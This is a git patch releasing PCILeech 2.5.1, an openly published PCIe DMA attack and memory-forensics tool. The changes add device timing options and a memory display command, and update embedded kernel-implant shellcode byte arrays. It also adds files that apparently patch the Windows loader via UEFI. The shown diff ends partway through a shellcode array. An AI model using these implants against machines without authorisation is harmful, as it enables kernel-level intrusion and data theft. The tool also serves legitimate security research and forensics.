From c6d332a3245a329fe79fed43b3d8abb05fd18277 Mon Sep 17 00:00:00 2001
From: ufrisk <github_ufrisk@frizk.net>
Date: Sun, 17 Dec 2017 22:50:07 +0100
Subject: [PATCH] Version 2.5.1

---
 pcileech/device605_601.c                      |  28 +-
 pcileech/executor.c                           |   2 +-
 pcileech/extra.c                              |   5 +
 pcileech/help.c                               |   6 +-
 pcileech/memdump.c                            |  35 +-
 pcileech/memdump.h                            |   7 +
 pcileech/pcileech.c                           |  15 +-
 pcileech/pcileech.h                           |   8 +-
 pcileech/shellcode.h                          | 127 +--
 pcileech/tlp.c                                |   2 +-
 pcileech/util.c                               |  11 +-
 pcileech/util.h                               |   3 +-
 pcileech_files/pcileech                       | Bin 160432 -> 164368 bytes
 pcileech_files/pcileech.exe                   | Bin 303104 -> 303616 bytes
 pcileech_files/uefi_textout.ksh               | Bin 707 -> 906 bytes
 pcileech_files/uefi_winload_ntos_patch.ksh    | Bin 0 -> 20319 bytes
 pcileech_files/wx64_filepull.ksh              | Bin 2529 -> 2257 bytes
 pcileech_files/wx64_filepush.ksh              | Bin 2197 -> 1933 bytes
 pcileech_files/wx64_pagesignature.ksh         | Bin 2823 -> 2555 bytes
 pcileech_files/wx64_pscmd.ksh                 | Bin 8432 -> 7616 bytes
 pcileech_files/wx64_pscmd_user.ksh            | Bin 8412 -> 7596 bytes
 pcileech_files/wx64_pscreate.ksh              | Bin 8373 -> 7557 bytes
 pcileech_shellcode/fbsdx64_common.h           |   8 +-
 pcileech_shellcode/fbsdx64_stage3_c.c         |  18 +-
 pcileech_shellcode/lx64_common.h              |  24 +-
 pcileech_shellcode/lx64_stage3_c.c            |  14 +-
 pcileech_shellcode/macos_common.c             |   2 +-
 pcileech_shellcode/macos_common.h             |  14 +-
 pcileech_shellcode/macos_stage3_c.c           |  22 +-
 pcileech_shellcode/pcileech_shellcode.vcxproj |   3 +
 .../pcileech_shellcode.vcxproj.filters        |   9 +
 pcileech_shellcode/uefi_common.h              | 167 ++-
 pcileech_shellcode/uefi_kmd_c.c               |  22 +-
 pcileech_shellcode/uefi_textout.c             |  11 +-
 pcileech_shellcode/uefi_winload_ntos_kmd.asm  |  88 ++
 pcileech_shellcode/uefi_winload_ntos_kmd_c.c  | 431 ++++++++
 pcileech_shellcode/uefi_winload_ntos_patch.c  | 949 ++++++++++++++++++
 pcileech_shellcode/wx64_common.c              |  61 +-
 pcileech_shellcode/wx64_common.h              |  24 +-
 pcileech_shellcode/wx64_exec_user_c.c         |  38 +-
 pcileech_shellcode/wx64_pscreate.c            | 307 +++---
 pcileech_shellcode/wx64_stage3_c.c            |  43 +-
 readme.md                                     |   4 +
 43 files changed, 2086 insertions(+), 422 deletions(-)
 create mode 100644 pcileech_files/uefi_winload_ntos_patch.ksh
 create mode 100644 pcileech_shellcode/uefi_winload_ntos_kmd.asm
 create mode 100644 pcileech_shellcode/uefi_winload_ntos_kmd_c.c
 create mode 100644 pcileech_shellcode/uefi_winload_ntos_patch.c

diff --git a/pcileech/device605_601.c b/pcileech/device605_601.c
index 1732ec6..440c61e 100644
--- a/pcileech/device605_601.c
+++ b/pcileech/device605_601.c
@@ -30,9 +30,9 @@
 
 // Delay in uS. DELAY_READ=300, DELAY_WRITE=150 -> 85MB/s.
 // Values below are a bit more conservative for hw tolerance reasons.
-#define DELAY_READ				400
-#define DELAY_WRITE				175
-#define DELAY_PROBE				500
+#define DELAY_READ_DEFAULT				400
+#define DELAY_WRITE_DEFAULT				175
+#define DELAY_PROBE_DEFAULT				500
 
 typedef struct tdDEVICE_CONTEXT_SP605_601 {
 	WORD wDeviceId;
@@ -84,8 +84,9 @@ typedef struct tdDEVICE_CONTEXT_SP605_601 {
 
 	} dev;
 	BOOL(*hRxTlpCallbackFn)(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
-	QWORD dbg_qwLastTx[8];
-	DWORD dbg_cbLastTx;
+	DWORD DELAY_READ;
+	DWORD DELAY_WRITE;
+	DWORD DELAY_PROBE;
 } DEVICE_CONTEXT_SP605_601, *PDEVICE_CONTEXT_SP605_601;
 
 //-------------------------------------------------------------------------------
@@ -297,13 +298,13 @@ BOOL Device605_601_ReadDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwA
 		isFlush = ((o % 0x8000) == 0x7000);
 		if(isFlush) {
 			Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, TRUE);
-			usleep(DELAY_WRITE);
+			usleep(ctx->DELAY_WRITE);
 		} else {
 			Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, FALSE);
 		}
 	}
 	Device605_601_TxTlp(ctx, NULL, 0, TRUE, TRUE);
-	usleep(DELAY_READ);
+	usleep(ctx->DELAY_READ);
 	Device605_601_RxTlpSynchronous(ctx);
 	ctx->pMRdBuffer = NULL;
 	return rxbuf.cb >= rxbuf.cbMax;
@@ -360,7 +361,7 @@ VOID Device605_601_ProbeDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qw
 		Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, (i % 24 == 0));
 	}
 	Device605_601_TxTlp(ctx, NULL, 0, TRUE, TRUE);
-	usleep(DELAY_PROBE);
+	usleep(ctx->DELAY_PROBE);
 	Device605_601_RxTlpSynchronous(ctx);
 	ctx->hRxTlpCallbackFn = NULL;
 	ctx->pMRdBuffer = NULL;
@@ -472,6 +473,9 @@ BOOL Device605_601_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
 	ctx->txbuf.pb = LocalAlloc(0, ctx->txbuf.cbMax);
 	if(!ctx->txbuf.pb) { goto fail; }
 	ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtra;
+	ctx->DELAY_READ = ctxPcileech->cfg->qwDeviceOpt[0] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[0] : DELAY_READ_DEFAULT;
+	ctx->DELAY_WRITE = ctxPcileech->cfg->qwDeviceOpt[1] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[1] : DELAY_WRITE_DEFAULT;
+	ctx->DELAY_PROBE = ctxPcileech->cfg->qwDeviceOpt[2] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[2] : DELAY_PROBE_DEFAULT;
 	// set callback functions and fix up config
 	ctxPcileech->cfg->dev.tp = PCILEECH_DEVICE_SP605_FT601;
 	ctxPcileech->cfg->dev.qwMaxSizeDmaIo = SP605_601_MAX_SIZE_RX;
@@ -484,7 +488,13 @@ BOOL Device605_601_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
 	ctxPcileech->cfg->dev.pfnWriteTlp = Device605_601_WriteTlp;
 	ctxPcileech->cfg->dev.pfnListenTlp = Device605_601_ListenTlp;
 	// return
-	if(ctxPcileech->cfg->fVerbose) { printf("Device Info: SP605 / FT601.\n"); }
+	if(ctxPcileech->cfg->fVerbose) { 
+		if((ctx->DELAY_READ != DELAY_READ_DEFAULT) || (ctx->DELAY_WRITE != DELAY_WRITE_DEFAULT) || (ctx->DELAY_PROBE != DELAY_PROBE_DEFAULT)) {
+			printf("Device Info: SP605 / FT601 [%i,%i,%i]\n", ctx->DELAY_READ, ctx->DELAY_WRITE, ctx->DELAY_PROBE);
+		} else {
+			printf("Device Info: SP605 / FT601.\n");
+		}
+	}
 	return TRUE;
 fail:
 	Device605_601_Close(ctxPcileech);
diff --git a/pcileech/executor.c b/pcileech/executor.c
index 1d62b95..74f7b41 100644
--- a/pcileech/executor.c
+++ b/pcileech/executor.c
@@ -342,7 +342,7 @@ VOID ActionExecShellcode(_Inout_ PPCILEECH_CONTEXT ctx)
 			goto fail;
 		}
 		// print to screen
-		Util_PrintHexAscii(pbBuffer, cbLength);
+		Util_PrintHexAscii(pbBuffer, cbLength, 0);
 		// write to out file
 		if(ctx->cfg->szFileOut[0]) {
 			// open output file
diff --git a/pcileech/extra.c b/pcileech/extra.c
index ac538aa..4f25907 100644
--- a/pcileech/extra.c
+++ b/pcileech/extra.c
@@ -198,6 +198,11 @@ VOID Action_TlpTx(_Inout_ PPCILEECH_CONTEXT ctx)
 {
 	if(ctx->cfg->cbIn < 12) {
 		printf("Action_TlpTx: Invalid TLP (too short).\n");
+		return;
+	}
+	if(ctx->cfg->cbIn % 4) {
+		printf("Action_TlpTx: Invalid TLP (length not multiple of 4).\n");
+		return;
 	}
 	printf("TLP: Transmitting PCIe TLP.%s\n", ctx->cfg->fVerboseExtra ? "" : " (use -vv option for detailed info).");
 	DeviceWriteTlp(ctx, ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn);
diff --git a/pcileech/help.c b/pcileech/help.c
index 0f3793f..b71446e 100644
--- a/pcileech/help.c
+++ b/pcileech/help.c
@@ -47,6 +47,7 @@ VOID Help_ShowGeneral()
 		"   kmdload                DMA       [ pt, cr3 ]                                \n" \
 		"   kmdexit                    KMD                                              \n" \
 		"   mount                      KMD   [ s ]          (Windows only feature)      \n" \
+		"   display                DMA,KMD   [ min, max ]                               \n" \
 		"   pagedisplay            DMA,KMD   [ min ]                                    \n" \
 		"   pt_phys2virt           DMA,KMD   [ cr3, 0 ]                                 \n" \
 		"   testmemread            DMA       [ min ]                                    \n" \
@@ -94,6 +95,9 @@ VOID Help_ShowGeneral()
 		"          Valid options: USB3380, SP605_FT601, SP605_TCP                       \n" \
 		"   -device-addr: Remote address for -device SP605_TCP.                         \n" \
 		"   -device-port: Remote TCP port for -device SP605_TCP. Default value: 28472.  \n" \
+		"   -device-opt[0-3]: Optional additional device configuration for some devices.\n" \
+		"          SP605_FT605 device: NB! 0 = default!. -device-opt0 = delay read uS   \n" \
+		"                -device-opt1 = delay write uS, -device-opt2 = delay probe uS   \n" \
 		"   -help: show help about the selected command or implant and then exit        \n" \
 		"          without running the command. Affects all modes and commands.         \n" \
 		"          Option has no value. Example: -help                                  \n" \
@@ -140,7 +144,7 @@ VOID Help_ShowInfo()
 	printf(
 		" PCILEECH INFORMATION                                                          \n" \
 		" PCILeech (c) 2016, 2017 Ulf Frisk                                             \n" \
-		" Version: 2.5                                                                  \n" \
+		" Version: 2.5.1                                                                \n" \
 		" License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007                 \n" \
 		" Contact information: pcileech@frizk.net                                       \n" \
 		" System requirements: 64-bit Windows 7, 10 or Linux.                           \n" \
diff --git a/pcileech/memdump.c b/pcileech/memdump.c
index 1e299a8..7809c10 100644
--- a/pcileech/memdump.c
+++ b/pcileech/memdump.c
@@ -154,16 +154,37 @@ VOID ActionMemoryProbe(_Inout_ PPCILEECH_CONTEXT ctx)
 	printf("Memory Probe: Completed.\n");
 }
 
-VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
+VOID ActionMemoryDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	BYTE pb[4096];
-	QWORD qwAddr = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
-	if(!DeviceReadMEM(ctx, qwAddr, pb, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-		printf("Memory Page Read: Failed reading memory at address: 0x%016llX.\n", qwAddr);
+	QWORD qwAddrBase, qwAddrOffset, qwSize, qwSize_4kAlign;
+	PBYTE pb;
+	// allocate and calculate values
+	pb = LocalAlloc(0, 0x10000);
+	if(!pb) { return; }
+	qwAddrBase = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
+	qwAddrOffset = ctx->cfg->qwAddrMin & 0xff0;
+	qwSize_4kAlign = SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMax) - qwAddrBase;
+	qwSize = ((ctx->cfg->qwAddrMax + 0xf) & 0x0fffffffffffffff0) - (qwAddrBase + qwAddrOffset);
+	if(qwSize_4kAlign > 0x10000) {
+		qwSize = 0x100;
+		qwSize_4kAlign = (qwAddrOffset <= 0xf00) ? 0x1000 : 0x2000;
+	}
+	// read memory and display output
+	if(!DeviceReadMEM(ctx, qwAddrBase, pb, (DWORD)qwSize_4kAlign, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+		printf("Memory Display: Failed reading memory at address: 0x%016llX.\n", qwAddrBase);
+		LocalFree(pb);
 		return;
 	}
-	printf("Memory Page Read: Page contents for address: 0x%016llX\n", qwAddr);
-	Util_PrintHexAscii(pb, 4096);
+	printf("Memory Display: Contents for address: 0x%016llX\n", qwAddrBase);
+	Util_PrintHexAscii(pb, (DWORD)qwSize, (DWORD)qwAddrOffset);
+	LocalFree(pb);
+}
+
+VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+	ctx->cfg->qwAddrMin = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
+	ctx->cfg->qwAddrMax = ctx->cfg->qwAddrMin + 0x1000;
+	ActionMemoryDisplay(ctx);
 }
 
 VOID ActionMemoryTestReadWrite(_Inout_ PPCILEECH_CONTEXT ctx)
diff --git a/pcileech/memdump.h b/pcileech/memdump.h
index 234a36d..411d9dc 100644
--- a/pcileech/memdump.h
+++ b/pcileech/memdump.h
@@ -47,4 +47,11 @@ VOID ActionMemoryTestReadWrite(_Inout_ PPCILEECH_CONTEXT ctx);
 */
 VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx);
 
+/*
+* Print out a maximum of 16kB (0x10000) memory limited by the min and max
+* parameters in pCfg. By default 0x100 bytes are displayed.
+* -- ctx
+*/
+VOID ActionMemoryDisplay(_Inout_ PPCILEECH_CONTEXT ctx);
+
 #endif /* __MEMDUMP_H__ */
\ No newline at end of file
diff --git a/pcileech/pcileech.c b/pcileech/pcileech.c
index 06a0c44..772da8a 100644
--- a/pcileech/pcileech.c
+++ b/pcileech/pcileech.c
@@ -33,6 +33,7 @@ BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEE
 		{.tp = MOUNT,.sz = "mount" },
 		{.tp = USB3380_START8051,.sz = "8051start" },
 		{.tp = USB3380_STOP8051,.sz = "8051stop" },
+		{.tp = DISPLAY,.sz = "display" },
 		{.tp = PAGEDISPLAY,.sz = "pagedisplay" },
 		{.tp = TESTMEMREAD,.sz = "testmemread" },
 		{.tp = TESTMEMREADWRITE,.sz = "testmemreadwrite" },
@@ -151,7 +152,9 @@ BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEE
 			}
 		} else if(2 == strlen(argv[i]) && '0' <= argv[i][1] && '9' >= argv[i][1]) { // -0..9 param
 			ctx->cfg->qwDataIn[argv[i][1] - '0'] = Util_GetNumeric(argv[i + 1]);
-		} 
+		} else if(!memcmp(argv[i], "-device-opt", 11) && (argv[i][11] >= '0') && (argv[i][11] <= '3')) { // -devopt[0-3] (device options)
+			ctx->cfg->qwDeviceOpt[argv[i][11] - '0'] = Util_GetNumeric(argv[i + 1]);
+		}
 		i += 2;
 	}
 	if(!ctx->cfg->pbIn) {
@@ -208,6 +211,14 @@ int main(_In_ int argc, _In_ char* argv[])
 		printf("PCILEECH: Out of memory.\n");
 		return 1;
 	}
+	//LPSTR szTMP[] = { "", "-device", "SP605_TCP", "-device-addr", "192.168.1.2", "dump", "-out", "none", "-min", "0x100000000", "-max", "0x110010000" };
+	//LPSTR szTMP[] = { "", "kmdload", "-kmd", "win10x64_ntfs_20170919_14240.kmd", "-min", "0x100000000" };
+	//LPSTR szTMP[] = { "", "mount", "-kmd", "win10_x64"};
+	//LPSTR szTMP[] = { "", "write", "-min", "0xc6010000", "-in", "c:\\temp\\16M_zero.raw"};
+	//LPSTR szTMP[] = { "", "pagedisplay", "-min", "0x1000", "-vv"};
+	///LPSTR szTMP[] = { "", "dump", "-out", "none", "-min", "0x100000000", "-max", "0x120000000"};
+	//LPSTR szTMP[] = { "", "tlp", "-in", "00000000c30000ffc1000000", "-vv"};
+	//result = PCILeechConfigIntialize(sizeof(szTMP) / sizeof(LPSTR), szTMP, ctx);
 	result = PCILeechConfigIntialize((DWORD)argc, argv, ctx);
 	if(!result) {
 		Help_ShowGeneral();
@@ -257,6 +268,8 @@ int main(_In_ int argc, _In_ char* argv[])
 		ActionMemoryDump(ctx);
 	} else if(ctx->cfg->tpAction == WRITE) {
 		ActionMemoryWrite(ctx);
+	} else if(ctx->cfg->tpAction == DISPLAY) {
+		ActionMemoryDisplay(ctx);
 	} else if(ctx->cfg->tpAction == PAGEDISPLAY) {
 		ActionMemoryPageDisplay(ctx);
 	} else if(ctx->cfg->tpAction == PATCH) {
diff --git a/pcileech/pcileech.h b/pcileech/pcileech.h
index 9769433..14d0dae 100644
--- a/pcileech/pcileech.h
+++ b/pcileech/pcileech.h
@@ -29,6 +29,7 @@ typedef enum tdActionType {
 	USB3380_FLASH,
 	USB3380_START8051,
 	USB3380_STOP8051,
+	DISPLAY,
 	PAGEDISPLAY,
 	TESTMEMREAD,
 	TESTMEMREADWRITE,
@@ -75,6 +76,7 @@ typedef struct tdConfig {
 	QWORD cbIn;
 	CHAR szInS[MAX_PATH];
 	QWORD qwDataIn[10];
+	QWORD qwDeviceOpt[4];
 	ACTION_TYPE tpAction;
 	CHAR szSignatureName[MAX_PATH];
 	CHAR szKMDName[MAX_PATH];
@@ -163,7 +165,7 @@ typedef struct tdKmdExec {
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
@@ -177,8 +179,8 @@ typedef struct tdKMDDATA {
 	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
diff --git a/pcileech/shellcode.h b/pcileech/shellcode.h
index b8884cc..9f9e889 100644
--- a/pcileech/shellcode.h
+++ b/pcileech/shellcode.h
@@ -939,12 +939,12 @@ const BYTE UEFI_X64_BIN[] = {
 	0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x57, 0x48,
 	0x83, 0xec, 0x20, 0x48, 0x8b, 0xda, 0x45, 0x33, 0xc0, 0xba, 0x00, 0x10,
 	0x00, 0x00, 0x48, 0x8b, 0xf9, 0xe8, 0x59, 0xfe, 0xff, 0xff, 0xba, 0x04,
-	0x00, 0x00, 0x00, 0x48, 0x89, 0x5f, 0x58, 0x48, 0xb8, 0x77, 0x33, 0x33,
-	0x11, 0x77, 0x33, 0x11, 0xff, 0x48, 0xc7, 0x47, 0x50, 0x10, 0x00, 0x00,
-	0x00, 0xbd, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0x07, 0x4c, 0x8d, 0x4c,
-	0x24, 0x30, 0x48, 0x89, 0x6c, 0x24, 0x30, 0x8d, 0x5a, 0xfd, 0x48, 0xc7,
-	0x47, 0x18, 0x00, 0x00, 0x00, 0x01, 0x8b, 0xcb, 0x41, 0xb8, 0x00, 0x10,
-	0x00, 0x00, 0xe8, 0x2f, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x31,
+	0x00, 0x00, 0x00, 0x48, 0xc7, 0x47, 0x50, 0x10, 0x00, 0x00, 0x00, 0x48,
+	0xb8, 0x77, 0x33, 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0x4c, 0x8d, 0x4c,
+	0x24, 0x30, 0x48, 0x89, 0x07, 0xbd, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89,
+	0x5f, 0x58, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x8d, 0x5a, 0xfd, 0x48,
+	0x89, 0x6c, 0x24, 0x30, 0x8b, 0xcb, 0x48, 0xc7, 0x47, 0x18, 0x00, 0x00,
+	0x00, 0x01, 0xe8, 0x2f, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x31,
 	0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x48, 0x89, 0x6c, 0x24, 0x30, 0x8d, 0x53,
 	0x03, 0x48, 0xc7, 0x47, 0x18, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00,
 	0x04, 0x00, 0x00, 0x8b, 0xcb, 0xe8, 0x08, 0xfe, 0xff, 0xff, 0x48, 0x85,
@@ -977,11 +977,11 @@ const BYTE UEFI_X64_BIN[] = {
 
 
 const BYTE WINX64_VFS_KSH[] = {
-	0x37, 0x13, 0xec, 0x3c, 0x72, 0x06, 0xae, 0x99, 0x7a, 0x09, 0xe0, 0x83,
-	0x60, 0xa6, 0x94, 0x62, 0xb6, 0x64, 0x74, 0xfb, 0x90, 0x49, 0xd7, 0x36,
-	0xc7, 0xfe, 0x97, 0xc0, 0x26, 0xe0, 0x4c, 0xac, 0xb3, 0xa5, 0x41, 0x65,
-	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x0a, 0x00, 0x00,
-	0x00, 0x00, 0x00, 0x00, 0x9a, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x37, 0x13, 0xec, 0x3c, 0xfd, 0xf7, 0x30, 0x9f, 0x78, 0x47, 0xc0, 0x51,
+	0x0e, 0x3b, 0xb5, 0x58, 0x72, 0xa5, 0xe9, 0x42, 0x30, 0x50, 0xe4, 0x5e,
+	0xdf, 0x7b, 0x18, 0x97, 0x75, 0x04, 0xfa, 0x02, 0xf2, 0x66, 0x21, 0x13,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd7, 0x09, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x72, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 	0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
@@ -1096,7 +1096,7 @@ const BYTE WINX64_VFS_KSH[] = {
 	0xc0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x33, 0xd2, 0x41, 0x8b, 0x86, 0x30,
 	0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8d, 0x45, 0xf7, 0x48,
 	0x89, 0x4c, 0x24, 0x28, 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x89, 0x44, 0x24,
-	0x20, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75,
+	0x20, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75,
 	0x0b, 0x48, 0x8b, 0x45, 0xff, 0x48, 0x89, 0x86, 0x00, 0x02, 0x00, 0x00,
 	0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97, 0x88,
 	0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b,
@@ -1148,70 +1148,45 @@ const BYTE WINX64_VFS_KSH[] = {
 	0xcb, 0xe8, 0x7e, 0xf9, 0xff, 0xff, 0xeb, 0xa0, 0xb8, 0x01, 0x00, 0x00,
 	0xc0, 0x48, 0x89, 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xf0,
 	0x00, 0x00, 0x00, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
-	0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x55,
-	0x48, 0x8d, 0xa8, 0x38, 0xff, 0xff, 0xff, 0x48, 0x81, 0xec, 0xc0, 0x01,
-	0x00, 0x00, 0xb8, 0x4a, 0x45, 0x3b, 0xd7, 0x48, 0x89, 0x54, 0x24, 0x20,
-	0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0xf1, 0x48, 0x8d, 0x42, 0x08,
-	0x48, 0xc7, 0x44, 0x24, 0x38, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x89, 0x44,
-	0x24, 0x30, 0xb9, 0x2a, 0xd0, 0x35, 0x30, 0x48, 0x8d, 0x42, 0x10, 0x48,
-	0xc7, 0x44, 0x24, 0x68, 0x92, 0x6d, 0x58, 0x58, 0x48, 0x89, 0x44, 0x24,
-	0x40, 0xb8, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48,
-	0x8d, 0x42, 0x18, 0x48, 0x89, 0x44, 0x24, 0x50, 0xb8, 0xa1, 0x7b, 0xcc,
-	0xdc, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x42, 0x20, 0x48, 0x89,
-	0x44, 0x24, 0x60, 0x48, 0x8d, 0x42, 0x28, 0x48, 0x89, 0x44, 0x24, 0x70,
-	0x48, 0x8d, 0x42, 0x30, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x42, 0x38,
-	0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x42, 0x40, 0x48, 0x89, 0x45, 0xa0,
-	0x48, 0x8d, 0x42, 0x48, 0x48, 0x89, 0x45, 0xb0, 0xb8, 0xf7, 0x38, 0xb3,
-	0x9d, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8d, 0x42, 0x50, 0x48, 0x89, 0x45,
-	0xc0, 0x48, 0x8d, 0x42, 0x58, 0x48, 0x89, 0x45, 0xd0, 0xb8, 0x89, 0x83,
-	0x6c, 0xeb, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x42, 0x60, 0x48, 0x89,
-	0x45, 0xe0, 0xb8, 0x9b, 0x97, 0x64, 0xcf, 0x48, 0x89, 0x45, 0xe8, 0x48,
-	0x8d, 0x42, 0x68, 0x48, 0x89, 0x45, 0xf0, 0xb8, 0x2a, 0xc0, 0xb2, 0xa8,
-	0x48, 0x89, 0x45, 0xf8, 0x48, 0x8d, 0x42, 0x70, 0x48, 0x89, 0x45, 0x00,
-	0x48, 0x8d, 0x42, 0x78, 0x48, 0x89, 0x45, 0x10, 0x48, 0x89, 0x45, 0x20,
-	0x48, 0x8d, 0x82, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x30, 0xb8,
-	0xdb, 0x4f, 0x3d, 0xc5, 0x48, 0x89, 0x45, 0x38, 0x48, 0x8d, 0x82, 0x88,
-	0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8d, 0x82, 0x90, 0x00,
-	0x00, 0x00, 0x48, 0x89, 0x45, 0x50, 0xb8, 0x9d, 0x8f, 0xa0, 0xc3, 0x48,
-	0x89, 0x45, 0x58, 0x48, 0x8d, 0x82, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
-	0x45, 0x60, 0xb8, 0xb8, 0xd4, 0x29, 0x88, 0x48, 0x89, 0x45, 0x68, 0x48,
-	0x8d, 0x82, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x70, 0xb8, 0x16,
-	0x35, 0xfd, 0x87, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8d, 0x82, 0xa0, 0x00,
-	0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x82,
-	0xa8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x78, 0xce, 0xad, 0x90,
-	0x4d, 0x48, 0xc7, 0x45, 0x88, 0x57, 0x63, 0x32, 0x5a, 0x48, 0xc7, 0x45,
-	0x98, 0x8f, 0xb5, 0x6a, 0x6a, 0x48, 0xc7, 0x45, 0xa8, 0xf9, 0xbe, 0xdd,
-	0x05, 0x48, 0xc7, 0x45, 0xc8, 0xc9, 0xc5, 0x6e, 0x6c, 0x48, 0xc7, 0x45,
-	0x08, 0x3d, 0x28, 0xc3, 0x7c, 0x48, 0x89, 0x4d, 0x18, 0x48, 0x89, 0x4d,
-	0x28, 0x48, 0xc7, 0x45, 0x48, 0x61, 0x4c, 0x04, 0x5d, 0x48, 0xc7, 0x85,
-	0x88, 0x00, 0x00, 0x00, 0x50, 0x64, 0xb0, 0x6f, 0x48, 0x89, 0x85, 0x90,
-	0x00, 0x00, 0x00, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0xb8, 0xe2, 0xca, 0x61,
-	0xe6, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x36, 0x31, 0x0e, 0x68,
-	0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00, 0xbf, 0x1a, 0x00, 0x00, 0x00,
-	0x48, 0x8d, 0x82, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x00,
